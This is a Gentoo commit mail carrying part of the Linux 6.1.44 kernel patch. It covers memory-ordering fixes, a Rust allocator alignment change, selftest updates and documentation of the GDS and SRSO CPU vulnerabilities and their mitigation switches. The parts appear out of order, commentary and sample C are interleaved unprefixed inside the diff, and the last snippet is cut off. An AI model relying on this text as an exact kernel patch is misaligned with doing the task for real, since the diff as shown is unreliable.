+@@ -447,7 +447,7 @@ static void smc_copy_sock_settings(struct sock *nsk, struct sock *osk,
+ 	nsk->sk_rcvbuf = osk->sk_rcvbuf;
+ 	nsk->sk_sndtimeo = osk->sk_sndtimeo;
+ 	nsk->sk_rcvtimeo = osk->sk_rcvtimeo;
+-	nsk->sk_mark = osk->sk_mark;
++	nsk->sk_mark = READ_ONCE(osk->sk_mark);
+ 	nsk->sk_priority = osk->sk_priority;
+ 	nsk->sk_rcvlowat = osk->sk_rcvlowat;
+ 	nsk->sk_bound_dev_if = osk->sk_bound_dev_if;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 5b19b6c53a2cb..78fa620a63981 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -779,7 +779,7 @@ static int unix_set_peek_off(struct sock *sk, int val)
+ 	if (mutex_lock_interruptible(&u->iolock))
+ 		return -EINTR;
+ 
+-	sk->sk_peek_off = val;
++	WRITE_ONCE(sk->sk_peek_off, val);
+ 	mutex_unlock(&u->iolock);
+ 
+ 	return 0;
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index efe9283e98935..e5c1510c098fd 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -643,7 +643,7 @@ static int cfg80211_parse_colocated_ap(const struct cfg80211_bss_ies *ies,
+ 
+ 	ret = cfg80211_calc_short_ssid(ies, &ssid_elem, &s_ssid_tmp);
+ 	if (ret)
+-		return ret;
++		return 0;
+ 
+ 	/* RNR IE may contain more than one NEIGHBOR_AP_INFO */
+ 	while (pos + sizeof(*ap_info) <= end) {
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 371d269d22fa0..22bf10ffbf2d1 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -504,7 +504,7 @@ static struct sk_buff *xsk_build_skb(struct xdp_sock *xs,
+ 
+ 	skb->dev = dev;
+ 	skb->priority = xs->sk.sk_priority;
+-	skb->mark = xs->sk.sk_mark;
++	skb->mark = READ_ONCE(xs->sk.sk_mark);
+ 	skb_shinfo(skb)->destructor_arg = (void *)(long)desc->addr;
+ 	skb->destructor = xsk_destruct_skb;
+ 
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index 7b1b93584bdbe..e65de78cb61bf 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -2174,7 +2174,7 @@ static struct xfrm_policy *xfrm_sk_policy_lookup(const struct sock *sk, int dir,
+ 
+ 		match = xfrm_selector_match(&pol->selector, fl, family);
+ 		if (match) {
+-			if ((sk->sk_mark & pol->mark.m) != pol->mark.v ||
++			if ((READ_ONCE(sk->sk_mark) & pol->mark.m) != pol->mark.v ||
+ 			    pol->if_id != if_id) {
+ 				pol = NULL;
+ 				goto out;
+diff --git a/rust/bindings/bindings_helper.h b/rust/bindings/bindings_helper.h
+index c48bc284214ab..fdb4e11df3bd3 100644
+--- a/rust/bindings/bindings_helper.h
++++ b/rust/bindings/bindings_helper.h
+@@ -9,5 +9,6 @@
+ #include <linux/slab.h>
+ 
+ /* `bindgen` gets confused at certain things. */
++const size_t BINDINGS_ARCH_SLAB_MINALIGN = ARCH_SLAB_MINALIGN;
+ const gfp_t BINDINGS_GFP_KERNEL = GFP_KERNEL;
+ const gfp_t BINDINGS___GFP_ZERO = __GFP_ZERO;
+diff --git a/rust/kernel/allocator.rs b/rust/kernel/allocator.rs
+index 397a3dd57a9b1..9363b527be664 100644
+--- a/rust/kernel/allocator.rs
++++ b/rust/kernel/allocator.rs
+@@ -9,6 +9,36 @@ use crate::bindings;
+ 
+ struct KernelAllocator;
+ 
++/// Calls `krealloc` with a proper size to alloc a new object aligned to `new_layout`'s alignment.
++///
++/// # Safety
++///
++/// - `ptr` can be either null or a pointer which has been allocated by this allocator.
++/// - `new_layout` must have a non-zero size.
++unsafe fn krealloc_aligned(ptr: *mut u8, new_layout: Layout, flags: bindings::gfp_t) -> *mut u8 {
++    // Customized layouts from `Layout::from_size_align()` can have size < align, so pad first.
++    let layout = new_layout.pad_to_align();
++
++    let mut size = layout.size();
++
++    if layout.align() > bindings::BINDINGS_ARCH_SLAB_MINALIGN {
++        // The alignment requirement exceeds the slab guarantee, thus try to enlarge the size
++        // to use the "power-of-two" size/alignment guarantee (see comments in `kmalloc()` for
++        // more information).
++        //
++        // Note that `layout.size()` (after padding) is guaranteed to be a multiple of
++        // `layout.align()`, so `next_power_of_two` gives enough alignment guarantee.
++        size = size.next_power_of_two();
++    }
++
++    // SAFETY:
++    // - `ptr` is either null or a pointer returned from a previous `k{re}alloc()` by the
++    //   function safety requirement.
++    // - `size` is greater than 0 since it's either a `layout.size()` (which cannot be zero
++    //    according to the function safety requirement) or a result from `next_power_of_two()`.
++    unsafe { bindings::krealloc(ptr as *const core::ffi::c_void, size, flags) as *mut u8 }
++}
++
+ unsafe impl GlobalAlloc for KernelAllocator {
+     unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
+         // `krealloc()` is used instead of `kmalloc()` because the latter is
+@@ -30,10 +60,20 @@ static ALLOCATOR: KernelAllocator = KernelAllocator;
+ // to extract the object file that has them from the archive. For the moment,
+ // let's generate them ourselves instead.
+ //
++// Note: Although these are *safe* functions, they are called by the compiler
++// with parameters that obey the same `GlobalAlloc` function safety
++// requirements: size and align should form a valid layout, and size is
++// greater than 0.
++//
+ // Note that `#[no_mangle]` implies exported too, nowadays.
+ #[no_mangle]
+-fn __rust_alloc(size: usize, _align: usize) -> *mut u8 {
+-    unsafe { bindings::krealloc(core::ptr::null(), size, bindings::GFP_KERNEL) as *mut u8 }
++fn __rust_alloc(size: usize, align: usize) -> *mut u8 {
++    // SAFETY: See assumption above.
++    let layout = unsafe { Layout::from_size_align_unchecked(size, align) };
++
++    // SAFETY: `ptr::null_mut()` is null and, per the assumption above, the size of
++    // `layout` is greater than 0.
++    unsafe { krealloc_aligned(ptr::null_mut(), layout, bindings::GFP_KERNEL) }
+ }
+ 
+ #[no_mangle]
+@@ -42,23 +82,27 @@ fn __rust_dealloc(ptr: *mut u8, _size: usize, _align: usize) {
+ }
+ 
+ #[no_mangle]
+-fn __rust_realloc(ptr: *mut u8, _old_size: usize, _align: usize, new_size: usize) -> *mut u8 {
+-    unsafe {
+-        bindings::krealloc(
+-            ptr as *const core::ffi::c_void,
+-            new_size,
+-            bindings::GFP_KERNEL,
+-        ) as *mut u8
+-    }
++fn __rust_realloc(ptr: *mut u8, _old_size: usize, align: usize, new_size: usize) -> *mut u8 {
++    // SAFETY: See assumption above.
++    let new_layout = unsafe { Layout::from_size_align_unchecked(new_size, align) };
++
++    // SAFETY: Per assumption above, `ptr` is allocated by `__rust_*` before, and the size of
++    // `new_layout` is greater than 0.
++    unsafe { krealloc_aligned(ptr, new_layout, bindings::GFP_KERNEL) }
+ }
+ 
+ #[no_mangle]
+-fn __rust_alloc_zeroed(size: usize, _align: usize) -> *mut u8 {
++fn __rust_alloc_zeroed(size: usize, align: usize) -> *mut u8 {
++    // SAFETY: See assumption above.
++    let layout = unsafe { Layout::from_size_align_unchecked(size, align) };
++
++    // SAFETY: `ptr::null_mut()` is null and, per the assumption above, the size of
++    // `layout` is greater than 0.
+     unsafe {
+-        bindings::krealloc(
+-            core::ptr::null(),
+-            size,
++        krealloc_aligned(
++            ptr::null_mut(),
++            layout,
+             bindings::GFP_KERNEL | bindings::__GFP_ZERO,
+-        ) as *mut u8
++        )
+     }
+ }
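
The Rust allocator change leans on kmalloc's guarantee that power-of-two
allocation sizes are naturally aligned: when a layout's alignment exceeds
ARCH_SLAB_MINALIGN, the padded size is rounded up to the next power of two.
The same size computation rendered in C, as a sketch (demo_kmalloc_size() is
an invented helper):

  #include <linux/align.h>
  #include <linux/log2.h>
  #include <linux/slab.h>

  static size_t demo_kmalloc_size(size_t size, size_t align)
  {
  	/* Pad so the size is a multiple of the alignment,
  	 * mirroring Layout::pad_to_align().
  	 */
  	size_t padded = ALIGN(size, align);

  	if (align <= ARCH_SLAB_MINALIGN)
  		return padded;	/* slab minimum already suffices */

  	/* power-of-two kmalloc buckets are naturally aligned */
  	return roundup_pow_of_two(padded);
  }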
+diff --git a/tools/perf/tests/shell/test_uprobe_from_different_cu.sh b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+index 00d2e0e2e0c28..319f36ebb9a40 100644
+--- a/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
++++ b/tools/perf/tests/shell/test_uprobe_from_different_cu.sh
+@@ -4,6 +4,12 @@
+ 
+ set -e
+ 
++# skip if there's no gcc
++if ! [ -x "$(command -v gcc)" ]; then
++        echo "failed: no gcc compiler"
++        exit 2
++fi
++
+ temp_dir=$(mktemp -d /tmp/perf-uprobe-different-cu-sh.XXXXXXXXXX)
+ 
+ cleanup()
+@@ -11,7 +17,7 @@ cleanup()
+ 	trap - EXIT TERM INT
+ 	if [[ "${temp_dir}" =~ ^/tmp/perf-uprobe-different-cu-sh.*$ ]]; then
+ 		echo "--- Cleaning up ---"
+-		perf probe -x ${temp_dir}/testfile -d foo
++		perf probe -x ${temp_dir}/testfile -d foo || true
+ 		rm -f "${temp_dir}/"*
+ 		rmdir "${temp_dir}"
+ 	fi
+diff --git a/tools/testing/selftests/rseq/rseq.c b/tools/testing/selftests/rseq/rseq.c
+index 4177f9507bbee..b736a5169aad0 100644
+--- a/tools/testing/selftests/rseq/rseq.c
++++ b/tools/testing/selftests/rseq/rseq.c
+@@ -32,9 +32,17 @@
+ #include "../kselftest.h"
+ #include "rseq.h"
+ 
+-static const ptrdiff_t *libc_rseq_offset_p;
+-static const unsigned int *libc_rseq_size_p;
+-static const unsigned int *libc_rseq_flags_p;
++/*
++ * Define weak versions to play nice with binaries that are statically linked
++ * against a libc that doesn't support registering its own rseq.
++ */
++__weak ptrdiff_t __rseq_offset;
++__weak unsigned int __rseq_size;
++__weak unsigned int __rseq_flags;
++
++static const ptrdiff_t *libc_rseq_offset_p = &__rseq_offset;
++static const unsigned int *libc_rseq_size_p = &__rseq_size;
++static const unsigned int *libc_rseq_flags_p = &__rseq_flags;
+ 
+ /* Offset from the thread pointer to the rseq area.  */
+ ptrdiff_t rseq_offset;
+@@ -108,9 +116,17 @@ int rseq_unregister_current_thread(void)
+ static __attribute__((constructor))
+ void rseq_init(void)
+ {
+-	libc_rseq_offset_p = dlsym(RTLD_NEXT, "__rseq_offset");
+-	libc_rseq_size_p = dlsym(RTLD_NEXT, "__rseq_size");
+-	libc_rseq_flags_p = dlsym(RTLD_NEXT, "__rseq_flags");
++	/*
++	 * If the libc's registered rseq size isn't already valid, it may be
++	 * because the binary is dynamically linked and not necessarily due to
++	 * libc not having registered a restartable sequence.  Try to find the
++	 * symbols if that's the case.
++	 */
++	if (!*libc_rseq_size_p) {
++		libc_rseq_offset_p = dlsym(RTLD_NEXT, "__rseq_offset");
++		libc_rseq_size_p = dlsym(RTLD_NEXT, "__rseq_size");
++		libc_rseq_flags_p = dlsym(RTLD_NEXT, "__rseq_flags");
++	}
+ 	if (libc_rseq_size_p && libc_rseq_offset_p && libc_rseq_flags_p &&
+ 			*libc_rseq_size_p != 0) {
+ 		/* rseq registration owned by glibc */
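
The rseq selftest fix uses weak definitions so that a binary statically
linked against a libc lacking __rseq_offset/__rseq_size/__rseq_flags still
links, then falls back to dlsym() at runtime when the weak size reads zero.
A self-contained illustration of that pattern (the __demo_feature_size symbol
is hypothetical; link with -ldl on older glibc):

  #define _GNU_SOURCE
  #include <dlfcn.h>
  #include <stdio.h>

  /* Weak definition: overridden if a strong one (e.g. from libc) is
   * present at link time; otherwise it defaults to zero.
   */
  __attribute__((weak)) unsigned int __demo_feature_size;

  int main(void)
  {
  	const unsigned int *size_p = &__demo_feature_size;

  	if (!*size_p) {
  		/* Possibly dynamically linked: probe later objects. */
  		const unsigned int *p =
  			dlsym(RTLD_NEXT, "__demo_feature_size");
  		if (p)
  			size_p = p;
  	}
  	printf("feature size: %u\n", *size_p);
  	return 0;
  }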
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json
+index a44455372646a..08d4861c2e782 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json
+@@ -131,5 +131,30 @@
+         "teardown": [
+             "echo \"1\" > /sys/bus/netdevsim/del_device"
+         ]
++    },
++    {
++        "id": "3e1e",
++        "name": "Add taprio Qdisc with an invalid cycle-time",
++        "category": [
++            "qdisc",
++            "taprio"
++        ],
++        "plugins": {
++            "requires": "nsPlugin"
++        },
++        "setup": [
++            "echo \"1 1 8\" > /sys/bus/netdevsim/new_device",
++            "$TC qdisc add dev $ETH root handle 1: taprio num_tc 3 map 2 2 1 0 2 2 2 2 2 2 2 2 2 2 2 2 queues 1@0 1@0 1@0 base-time 1000000000 sched-entry S 01 300000 flags 0x1 clockid CLOCK_TAI cycle-time 4294967296 || /bin/true",
++            "$IP link set dev $ETH up",
++            "$IP addr add 10.10.10.10/24 dev $ETH"
++        ],
++        "cmdUnderTest": "/bin/true",
++        "expExitCode": "0",
++        "verifyCmd": "$TC qdisc show dev $ETH",
++        "matchPattern": "qdisc taprio 1: root refcnt",
++        "matchCount": "0",
++        "teardown": [
++            "echo \"1\" > /sys/bus/netdevsim/del_device"
++        ]
+     }
+ ]


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-08 18:40 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-08 18:40 UTC (permalink / raw
  To: gentoo-commits

commit:     44bf627114eb52a75a55341e74a081912edd6c12
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Aug  8 18:40:23 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Aug  8 18:40:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=44bf6271

Linux patch 6.1.44

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1043_linux-6.1.44.patch | 2841 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2845 insertions(+)

diff --git a/0000_README b/0000_README
index c3798828..12241a14 100644
--- a/0000_README
+++ b/0000_README
@@ -215,6 +215,10 @@ Patch:  1042_linux-6.1.43.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.43
 
+Patch:  1043_linux-6.1.44.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.44
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1043_linux-6.1.44.patch b/1043_linux-6.1.44.patch
new file mode 100644
index 00000000..0c2a79ff
--- /dev/null
+++ b/1043_linux-6.1.44.patch
@@ -0,0 +1,2841 @@
+diff --git a/Documentation/ABI/testing/sysfs-devices-system-cpu b/Documentation/ABI/testing/sysfs-devices-system-cpu
+index f54867cadb0f6..13c01b641dc70 100644
+--- a/Documentation/ABI/testing/sysfs-devices-system-cpu
++++ b/Documentation/ABI/testing/sysfs-devices-system-cpu
+@@ -513,17 +513,18 @@ Description:	information about CPUs heterogeneity.
+ 		cpu_capacity: capacity of cpuX.
+ 
+ What:		/sys/devices/system/cpu/vulnerabilities
++		/sys/devices/system/cpu/vulnerabilities/gather_data_sampling
++		/sys/devices/system/cpu/vulnerabilities/itlb_multihit
++		/sys/devices/system/cpu/vulnerabilities/l1tf
++		/sys/devices/system/cpu/vulnerabilities/mds
+ 		/sys/devices/system/cpu/vulnerabilities/meltdown
++		/sys/devices/system/cpu/vulnerabilities/mmio_stale_data
++		/sys/devices/system/cpu/vulnerabilities/retbleed
++		/sys/devices/system/cpu/vulnerabilities/spec_store_bypass
+ 		/sys/devices/system/cpu/vulnerabilities/spectre_v1
+ 		/sys/devices/system/cpu/vulnerabilities/spectre_v2
+-		/sys/devices/system/cpu/vulnerabilities/spec_store_bypass
+-		/sys/devices/system/cpu/vulnerabilities/l1tf
+-		/sys/devices/system/cpu/vulnerabilities/mds
+ 		/sys/devices/system/cpu/vulnerabilities/srbds
+ 		/sys/devices/system/cpu/vulnerabilities/tsx_async_abort
+-		/sys/devices/system/cpu/vulnerabilities/itlb_multihit
+-		/sys/devices/system/cpu/vulnerabilities/mmio_stale_data
+-		/sys/devices/system/cpu/vulnerabilities/retbleed
+ Date:		January 2018
+ Contact:	Linux kernel mailing list <linux-kernel@vger.kernel.org>
+ Description:	Information about CPU vulnerabilities
+diff --git a/Documentation/admin-guide/hw-vuln/gather_data_sampling.rst b/Documentation/admin-guide/hw-vuln/gather_data_sampling.rst
+new file mode 100644
+index 0000000000000..264bfa937f7de
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/gather_data_sampling.rst
+@@ -0,0 +1,109 @@
++.. SPDX-License-Identifier: GPL-2.0
++
++GDS - Gather Data Sampling
++==========================
++
++Gather Data Sampling is a hardware vulnerability which allows unprivileged
++speculative access to data which was previously stored in vector registers.
++
++Problem
++-------
++When a gather instruction performs loads from memory, different data elements
++are merged into the destination vector register. However, when a gather
++instruction that is transiently executed encounters a fault, stale data from
++architectural or internal vector registers may get transiently forwarded to the
++destination vector register instead. This will allow a malicious attacker to
++infer stale data using typical side channel techniques like cache timing
++attacks. GDS is a purely sampling-based attack.
++
++The attacker uses gather instructions to infer the stale vector register data.
++The victim does not need to do anything special other than use the vector
++registers. The victim does not need to use gather instructions to be
++vulnerable.
++
++Because the buffers are shared between Hyper-Threads, cross-Hyper-Thread
++attacks are possible.
++
++Attack scenarios
++----------------
++Without mitigation, GDS can infer stale data across virtually all
++permission boundaries:
++
++	Non-enclaves can infer SGX enclave data
++	Userspace can infer kernel data
++	Guests can infer data from hosts
++	Guest can infer guest from other guests
++	Users can infer data from other users
++
++Because of this, it is important to ensure that the mitigation stays enabled in
++lower-privilege contexts like guests and when running outside SGX enclaves.
++
++The hardware enforces the mitigation for SGX. Likewise, VMMs should ensure
++that guests are not allowed to disable the GDS mitigation. If a host erred and
++allowed this, a guest could theoretically disable GDS mitigation, mount an
++attack, and re-enable it.
++
++Mitigation mechanism
++--------------------
++This issue is mitigated in microcode. The microcode defines the following new
++bits:
++
++ ================================   ===   ============================
++ IA32_ARCH_CAPABILITIES[GDS_CTRL]   R/O   Enumerates GDS vulnerability
++                                          and mitigation support.
++ IA32_ARCH_CAPABILITIES[GDS_NO]     R/O   Processor is not vulnerable.
++ IA32_MCU_OPT_CTRL[GDS_MITG_DIS]    R/W   Disables the mitigation
++                                          0 by default.
++ IA32_MCU_OPT_CTRL[GDS_MITG_LOCK]   R/W   Locks GDS_MITG_DIS=0. Writes
++                                          to GDS_MITG_DIS are ignored
++                                          Can't be cleared once set.
++ ================================   ===   ============================
++
++GDS can also be mitigated on systems that don't have updated microcode by
++disabling AVX. This can be done by setting gather_data_sampling="force" or
++"clearcpuid=avx" on the kernel command-line.
++
++If used, these options will disable AVX use by turning off XSAVE YMM support.
++However, the processor will still enumerate AVX support.  Userspace that
++does not follow proper AVX enumeration to check both AVX *and* XSAVE YMM
++support will break.
++
++Mitigation control on the kernel command line
++---------------------------------------------
++The mitigation can be disabled by setting "gather_data_sampling=off" or
++"mitigations=off" on the kernel command line. Not specifying either will default
++to the mitigation being enabled. Specifying "gather_data_sampling=force" will
++use the microcode mitigation when available or disable AVX on affected systems
++where the microcode hasn't been updated to include the mitigation.
++
++GDS System Information
++------------------------
++The kernel provides vulnerability status information through sysfs. For
++GDS this can be accessed by the following sysfs file:
++
++/sys/devices/system/cpu/vulnerabilities/gather_data_sampling
++
++The possible values contained in this file are:
++
++ ============================== =============================================
++ Not affected                   Processor not vulnerable.
++ Vulnerable                     Processor vulnerable and mitigation disabled.
++ Vulnerable: No microcode       Processor vulnerable and microcode is missing
++                                mitigation.
++ Mitigation: AVX disabled,
++ no microcode                   Processor is vulnerable and microcode is missing
++                                mitigation. AVX disabled as mitigation.
++ Mitigation: Microcode          Processor is vulnerable and mitigation is in
++                                effect.
++ Mitigation: Microcode (locked) Processor is vulnerable and mitigation is in
++                                effect and cannot be disabled.
++ Unknown: Dependent on
++ hypervisor status              Running on a virtual guest processor that is
++                                affected but with no way to know if host
++                                processor is mitigated or vulnerable.
++ ============================== =============================================
++
++GDS Default mitigation
++----------------------
++The updated microcode will enable the mitigation by default. The kernel's
++default action is to leave the mitigation enabled.
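
The new document points administrators at a single sysfs file for GDS status.
A small C reader for it, purely illustrative (the path comes straight from
the text above):

  #include <stdio.h>

  int main(void)
  {
  	char line[128];
  	FILE *f = fopen("/sys/devices/system/cpu/vulnerabilities/"
  			"gather_data_sampling", "r");

  	if (!f) {
  		perror("fopen");	/* kernels without GDS support */
  		return 1;
  	}
  	if (fgets(line, sizeof(line), f))
  		fputs(line, stdout);	/* e.g. "Mitigation: Microcode" */
  	fclose(f);
  	return 0;
  }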
+diff --git a/Documentation/admin-guide/hw-vuln/index.rst b/Documentation/admin-guide/hw-vuln/index.rst
+index e0614760a99e7..6828102baaa7a 100644
+--- a/Documentation/admin-guide/hw-vuln/index.rst
++++ b/Documentation/admin-guide/hw-vuln/index.rst
+@@ -19,3 +19,5 @@ are configurable at compile, boot or run time.
+    l1d_flush.rst
+    processor_mmio_stale_data.rst
+    cross-thread-rsb.rst
++   gather_data_sampling.rst
++   srso
+diff --git a/Documentation/admin-guide/hw-vuln/srso.rst b/Documentation/admin-guide/hw-vuln/srso.rst
+new file mode 100644
+index 0000000000000..2f923c805802f
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/srso.rst
+@@ -0,0 +1,133 @@
++.. SPDX-License-Identifier: GPL-2.0
++
++Speculative Return Stack Overflow (SRSO)
++========================================
++
++This is a mitigation for the speculative return stack overflow (SRSO)
++vulnerability found on AMD processors. The mechanism is by now the well
++known scenario of poisoning CPU functional units - the Branch Target
++Buffer (BTB) and Return Address Predictor (RAP) in this case - and then
++tricking the elevated privilege domain (the kernel) into leaking
++sensitive data.
++
++AMD CPUs predict RET instructions using a Return Address Predictor (aka
++Return Address Stack/Return Stack Buffer). In some cases, a non-architectural
++CALL instruction (i.e., an instruction predicted to be a CALL but is
++not actually a CALL) can create an entry in the RAP which may be used
++to predict the target of a subsequent RET instruction.
++
++The specific circumstances that lead to this varies by microarchitecture
++but the concern is that an attacker can mis-train the CPU BTB to predict
++non-architectural CALL instructions in kernel space and use this to
++control the speculative target of a subsequent kernel RET, potentially
++leading to information disclosure via a speculative side-channel.
++
++The issue is tracked under CVE-2023-20569.
++
++Affected processors
++-------------------
++
++AMD Zen, generations 1-4. That is, all families 0x17 and 0x19. Older
++processors have not been investigated.
++
++System information and options
++------------------------------
++
++First of all, it is required that the latest microcode be loaded for
++mitigations to be effective.
++
++The sysfs file showing SRSO mitigation status is:
++
++  /sys/devices/system/cpu/vulnerabilities/spec_rstack_overflow
++
++The possible values in this file are:
++
++ - 'Not affected'               The processor is not vulnerable
++
++ - 'Vulnerable: no microcode'   The processor is vulnerable, no
++                                microcode extending IBPB functionality
++                                to address the vulnerability has been
++                                applied.
++
++ - 'Mitigation: microcode'      Extended IBPB functionality microcode
++                                patch has been applied. It does not
++                                address User->Kernel and Guest->Host
++                                transitions protection but it does
++                                address User->User and VM->VM attack
++                                vectors.
++
++                                (spec_rstack_overflow=microcode)
++
++ - 'Mitigation: safe RET'       Software-only mitigation. It complements
++                                the extended IBPB microcode patch
++                                functionality by addressing User->Kernel
++                                and Guest->Host transitions protection.
++
++                                Selected by default or by
++                                spec_rstack_overflow=safe-ret
++
++ - 'Mitigation: IBPB'           Similar protection as "safe RET" above
++                                but employs an IBPB barrier on privilege
++                                domain crossings (User->Kernel,
++                                Guest->Host).
++
++                                (spec_rstack_overflow=ibpb)
++
++ - 'Mitigation: IBPB on VMEXIT' Mitigation addressing the cloud provider
++                                scenario - the Guest->Host transitions
++                                only.
++
++                                (spec_rstack_overflow=ibpb-vmexit)
++
++In order to exploit the vulnerability, an attacker needs to:
++
++ - gain local access on the machine
++
++ - break kASLR
++
++ - find gadgets in the running kernel in order to use them in the exploit
++
++ - potentially create and pin an additional workload on the sibling
++   thread, depending on the microarchitecture (not necessary on fam 0x19)
++
++ - run the exploit
++
++Considering the performance implications of each mitigation type, the
++default one is 'Mitigation: safe RET' which should take care of most
++attack vectors, including the local User->Kernel one.
++
++As always, the user is advised to keep her/his system up-to-date by
++applying software updates regularly.
++
++The default setting will be reevaluated when needed and especially when
++new attack vectors appear.
++
++As one can surmise, 'Mitigation: safe RET' does come at the cost of some
++performance depending on the workload. If one trusts her/his userspace
++and does not want to suffer the performance impact, one can always
++disable the mitigation with spec_rstack_overflow=off.
++
++Similarly, 'Mitigation: IBPB' is another full mitigation type employing
++an indirect branch prediction barrier after having applied the required
++microcode patch for one's system. This mitigation also comes at
++a performance cost.
++
++Mitigation: safe RET
++--------------------
++
++The mitigation works by ensuring all RET instructions speculate to
++a controlled location, similar to how speculation is controlled in the
++retpoline sequence.  To accomplish this, the __x86_return_thunk forces
++the CPU to mispredict every function return using a 'safe return'
++sequence.
++
++For this mitigation to be safe, the kernel must ensure that the
++safe return sequence is itself free from attacker interference.  In Zen3
++and Zen4, this is accomplished by creating a BTB alias between the
++untraining function srso_untrain_ret_alias() and the safe return
++function srso_safe_ret_alias(), which results in evicting a potentially
++poisoned BTB entry and using that safe one for all function returns.
++
++In older Zen1 and Zen2, this is accomplished using a reinterpretation
++technique similar to the Retbleed one: srso_untrain_ret() and
++srso_safe_ret().
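
For quick auditing, the spec_rstack_overflow sysfs file documented above
can be read from any language; a minimal C sketch (illustrative, not part
of the patch; it assumes only the sysfs path from the documentation and a
kernel carrying this change):

#include <stdio.h>

int main(void)
{
	const char *path =
		"/sys/devices/system/cpu/vulnerabilities/spec_rstack_overflow";
	char line[128];
	FILE *f = fopen(path, "r");

	if (!f) {
		perror(path);	/* older kernels do not expose this file */
		return 1;
	}
	if (fgets(line, sizeof(line), f))
		fputs(line, stdout);	/* e.g. "Mitigation: safe RET" */
	fclose(f);
	return 0;
}
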
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 6b838869554b1..286be425f3bfa 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -1593,6 +1593,26 @@
+ 			Format: off | on
+ 			default: on
+ 
++	gather_data_sampling=
++			[X86,INTEL] Control the Gather Data Sampling (GDS)
++			mitigation.
++
++			Gather Data Sampling is a hardware vulnerability which
++			allows unprivileged speculative access to data that was
++			previously stored in vector registers.
++
++			This issue is mitigated by default in updated microcode.
++			The mitigation may have a performance impact but can be
++			disabled. On systems without the microcode mitigation,
++			disabling AVX serves as a mitigation.
++
++			force:	Disable AVX as a mitigation on systems
++				without the microcode mitigation. No effect if
++				the microcode mitigation is present. Known to
++				cause crashes in userspace with buggy AVX
++				enumeration.
++
++			off:	Disable GDS mitigation.
++
+ 	gcov_persist=	[GCOV] When non-zero (default), profiling data for
+ 			kernel modules is saved and remains accessible via
+ 			debugfs, even when the module is unloaded/reloaded.
+@@ -3228,24 +3248,25 @@
+ 				Disable all optional CPU mitigations.  This
+ 				improves system performance, but it may also
+ 				expose users to several CPU vulnerabilities.
+-				Equivalent to: nopti [X86,PPC]
+-					       if nokaslr then kpti=0 [ARM64]
+-					       nospectre_v1 [X86,PPC]
+-					       nobp=0 [S390]
+-					       nospectre_v2 [X86,PPC,S390,ARM64]
+-					       spectre_v2_user=off [X86]
+-					       spec_store_bypass_disable=off [X86,PPC]
+-					       ssbd=force-off [ARM64]
+-					       nospectre_bhb [ARM64]
++				Equivalent to: if nokaslr then kpti=0 [ARM64]
++					       gather_data_sampling=off [X86]
++					       kvm.nx_huge_pages=off [X86]
+ 					       l1tf=off [X86]
+ 					       mds=off [X86]
+-					       tsx_async_abort=off [X86]
+-					       kvm.nx_huge_pages=off [X86]
+-					       srbds=off [X86,INTEL]
++					       mmio_stale_data=off [X86]
+ 					       no_entry_flush [PPC]
+ 					       no_uaccess_flush [PPC]
+-					       mmio_stale_data=off [X86]
++					       nobp=0 [S390]
++					       nopti [X86,PPC]
++					       nospectre_bhb [ARM64]
++					       nospectre_v1 [X86,PPC]
++					       nospectre_v2 [X86,PPC,S390,ARM64]
+ 					       retbleed=off [X86]
++					       spec_store_bypass_disable=off [X86,PPC]
++					       spectre_v2_user=off [X86]
++					       srbds=off [X86,INTEL]
++					       ssbd=force-off [ARM64]
++					       tsx_async_abort=off [X86]
+ 
+ 				Exceptions:
+ 					       This does not have any effect on
+@@ -5764,6 +5785,17 @@
+ 			Not specifying this option is equivalent to
+ 			spectre_v2_user=auto.
+ 
++	spec_rstack_overflow=
++			[X86] Control RAS overflow mitigation on AMD Zen CPUs
++
++			off		- Disable mitigation
++			microcode	- Enable microcode mitigation only
++			safe-ret	- Enable sw-only safe RET mitigation (default)
++			ibpb		- Enable mitigation by issuing IBPB on
++					  kernel entry
++			ibpb-vmexit	- Issue IBPB only on VMEXIT
++					  (cloud-specific mitigation)
++
+ 	spec_store_bypass_disable=
+ 			[HW] Control Speculative Store Bypass (SSB) Disable mitigation
+ 			(Speculative Store Bypass vulnerability)
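
Whether the two new parameters above actually reached the kernel can be
confirmed by scanning /proc/cmdline. A hedged C sketch (not from the
patch; the option names come from the documentation above, everything
else is illustrative):

#include <stdio.h>
#include <string.h>

static void print_opt(const char *cmdline, const char *opt)
{
	const char *v = strstr(cmdline, opt);

	if (!v)
		return;
	v += strlen(opt);
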